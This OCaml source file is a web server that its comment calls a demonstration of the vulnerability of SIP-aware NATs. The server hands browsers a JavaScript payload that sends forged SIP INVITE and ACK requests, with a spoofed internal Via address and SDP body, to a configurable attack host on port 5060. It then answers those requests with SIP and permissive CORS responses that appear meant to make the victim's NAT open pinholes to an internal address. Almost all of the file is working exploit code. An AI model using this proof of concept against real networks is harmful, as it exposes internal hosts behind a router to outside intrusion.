open Printf
open Str
open Unix

(*
 * rudimentary, quick+dirty Web server to demonstrate
 * the vulnerability of SIP aware NATs
 *
 * RUN AT YOUR OWN RISK
 *)

let srvport = 5060
let attackhost = "your attack host name"
let metlim = regexp "[A-Z]+"
let hdlim = Str.regexp "\r\n[^ \t\r\n]"
let clenlim = Str.regexp "\r\nContent-Length: *"
let clenxlim = Str.regexp "[0-9]+"
let bdlim = Str.regexp "\r\n\r\n"

let string_smatch rx s off =
    try
	let _ = search_forward rx s off
	in
	true
    with Not_found -> false

let bdread c buf bd wr clen =
    let rec loop of1 tg =
	if tg = 0 then 
	    String.sub buf bd clen
	else
	    let rlen = read c buf of1 tg
	    in
	    if rlen > 0 then
		loop (of1 + rlen) (tg - rlen)
	    else
		String.sub buf bd clen
    in
    let tg = clen - (wr - bd)
    in
    loop wr tg

(*
 * read HTTP-style message, return framed message, offset to end of message
 * in 'buf'
 *)
let hrecv c buf off =
    let bfill buf off slen = (String.sub buf off slen)
				^ (String.create (4096 - slen))
    in
    let rec loop of1 =
	let _ = print_endline (sprintf "tmsg <%s>"
		    (String.sub buf off (of1 - off))) in
	let rlen = read c buf of1 (4096 - of1)
	in
	if rlen > 0 then
	    if string_smatch bdlim buf off then
		let bd = match_end ()
		in
		if string_smatch clenlim buf off then
		    let clenh = match_end ()
		    in
		    if string_smatch clenxlim buf clenh then
			let clen = int_of_string (matched_string buf)
			in
			let mlen = (bd - off) + clen
			in
			let bdy = bdread c buf bd (of1 + rlen) clen
			in
			let _ = print_endline (sprintf "bdy <%s>" bdy) in
			(bfill buf (off + mlen) (4096 - mlen),
			  (String.sub buf off (bd - off)) ^ bdy,
			0)
		    else
			(buf, "", 0)
		else
		    let msg = String.sub buf off (bd - off)
		    in
		    (bfill buf bd (4096 - bd), msg, 0)
	    else
		let _ = print_endline "no bdmatch"
		in
		loop (of1 + rlen)
	else 
	    (bfill buf of1 (4096 - of1),
		String.sub buf off (of1 - off), 
		of1)
    in
    loop off

let requrl buf off =
    let slen = String.length buf
    in
    let rec loop a i =
	if i = slen then
	    String.sub buf a (i - a)
	else if a = i then
	    if buf.[i] = ' ' || buf.[i] = '\t' then
		loop (i + 1) (i + 1)
	    else
		loop i (i + 1)
	else if buf.[i] = ' ' || buf.[i] = '\t' then
	    String.sub buf a (i - a)
	else 
	    loop a (i + 1)
    in
    loop off off

let erres c err =
    let res = sprintf "HTTP/1.1 %s\r\n\
Server: Test\r\n\
\r\n" err
    in
    write c res 0 (String.length res);
    ()

let js_res c =
    let html = sprintf "<html>
<head>
<title>
Test
</title>
</head>
<body>
<h1>Test d</h1>
<script language=\"javascript\">
x = new XMLHttpRequest();
x.open('INVITE', 'http://%s:5060/sip:bla@fasel/SIP/2.0', false);
x.setRequestHeader('Via', 'SIP/2.0/TCP 192.168.2.2;branch=z9hG4bKn123');
x.setRequestHeader('Content-Type', 'application/sdp');
x.send(\"v=0\\r\\n\
o=bla 0 0 IN IP4 192.168.2.2\\r\\n\
s=-\\r\\n\
t=0 0\\r\\n\
c=IN IP4 192.168.2.2\\r\\n\
m=audio 52 RTP/AVP 0\\r\\n\
a=rtpmap:0 PCMU/8000\\r\\n\");
x.open('ACK', 'http://%s:5060/sip:bla@fasel/SIP/2.0', false);
x.send(null);
</script>
</body>
</html>\r\n" attackhost attackhost
    in
    let res = sprintf "HTTP/1.1 200 OK\r\n\
MIME-Version: 1.0\r\n\
Accept: application/sdp, text/html\r\n\
Allow: INVITE, GET, POST, PUT, OPTIONS\r\n\
Content-Type: text/html\r\n\
Content-Length: %d\r\n\
\r\n\
%s" (String.length html) html
    in
    print_endline res;
    print_endline "++";
    write c res 0 (String.length res);
    ()

let fileres0 c ct fname =
    let st = Unix.stat fname
    and wlen = 4096
    in
    let wbuf = String.create wlen
    and fd = Unix.openfile fname [O_RDONLY] 0o644
    in
    let clen = st.st_size
    in
    let res = sprintf "HTTP/1.1 200 OK\r\n\
MIME-Version: 1.0\r\n\
Content-Type: %s\r\n\
Content-Length: %d\r\n\
\r\n" ct clen
    in
    let _ = write c res 0 (String.length res)
    in
    let rec loop i =
	if i >= clen then ()
	else
	    let rdlen = read fd wbuf 0 wlen
	    in
	    if rdlen > 0 then
		let wrlen = write c wbuf 0 rdlen
		in
		loop (i + rdlen)
	    else
		let _ = close fd
		in
		()
    in
    loop 0

let fileres c ct fname =
    try
	fileres0 c ct fname
    with _ ->
	erres c "404 Not found"

let getres c rurl =
    print_endline (sprintf "rurl <%s>" rurl);
    match rurl with
      "/" -> js_res c
    | "/index.html" -> js_res c
    | "/hello.html" -> fileres c "text/html" "hello.html"
    | "/hello.swf" -> fileres c "application/x-shockwave-flash" "hello.swf"
    | fname -> fileres c "application/octet-stream" (Filename.basename fname)

let optres c =
    let res = "HTTP/1.1 200 OK\r\n\
Access-Control-Allow-Methods: INVITE, GET, POST, PUT, OPTIONS\r\n\
Access-Control-Allow-Origin: http://localhost:5060\r\n\
Connection: keep-alive\r\n\
Vary: Accept-Encoding\r\n\
Keep-Alive: timeout=2, max=100\r\n\
Origin: http://localhost:5060\r\n\
\r\n"
    in
    print_endline res;
    print_endline "++";
    write c res 0 (String.length res);
    ()

let invres c =
    let _ = print_endline "** handling INVITE" in
    let res = "SIP/2.0 180 Ringing\r\n\
Via: SIP/2.0/TCP 192.168.2.2;branch=z9hG4bKn123\r\n\
Server: Test\r\n\
Content-Length: 0\r\n\
\r\n"
    in
    print_endline res;
    print_endline "++";
    write c res 0 (String.length res);
    let res = "SIP/2.0 200 OK\r\n\
Via: SIP/2.0/TCP 192.168.2.2;branch=z9hG4bKn123\r\n\
Server: Test\r\n\
Content-Length: 0\r\n\
\r\n"
    in
    print_endline res;
    print_endline "++";
    write c res 0 (String.length res);
    ()

let ackres c =
    let _ = print_endline "** handling ACK" in
    ()

let postres c =
    let res = "HTTP/1.1 200 OK\r\n\
Server: Test\r\n\
Content-Length: 0\r\n\
\r\n"
    in
    print_endline res;
    print_endline "++";
    write c res 0 (String.length res);
    ()

let handle c =
    let buf = String.create 4096
    in
    let rec loop off =
	let buf, msg, off = hrecv c buf off
	in
	let _ = print_endline (sprintf "handle <%s>" msg) in
	let _ = 
	    if string_smatch metlim msg 0 then
		let met = matched_string msg
		in
		let rurl = requrl msg (String.length met)
		in
		match met with
		  "GET" -> getres c rurl
		| "OPTIONS" -> optres c
		| "INVITE" -> invres c
		| "ACK" -> ackres c
		| "POST" -> postres c
		| _ -> erres c "500 Server Error"
	    else
		print_endline (sprintf "no req <%s>" msg)
	in
	let _ = print_endline msg
	in
	let _ = print_endline "--"
	in
	if msg <> "" then
	    loop 0
	else
	    let _ = print_endline "close http connection"
	    in
	    let _ = shutdown c SHUTDOWN_ALL
	    in
	    let _ = close c
	    in
	    ()
    in
    loop 0

let main () =
    let s = socket PF_INET SOCK_STREAM 0
    in
    let _ = setsockopt s SO_REUSEADDR true
    in
    let _ = bind s (ADDR_INET (inet_addr_any, srvport))
    in
    let _ = listen s 5
    in
    let rec loop pids s =
	let (c, _) = accept s
	in
	let pid = fork ()
	in
	if pid = 0 then handle c
	else loop (pid :: pids) s
    in
    loop [] s

;;

main ()
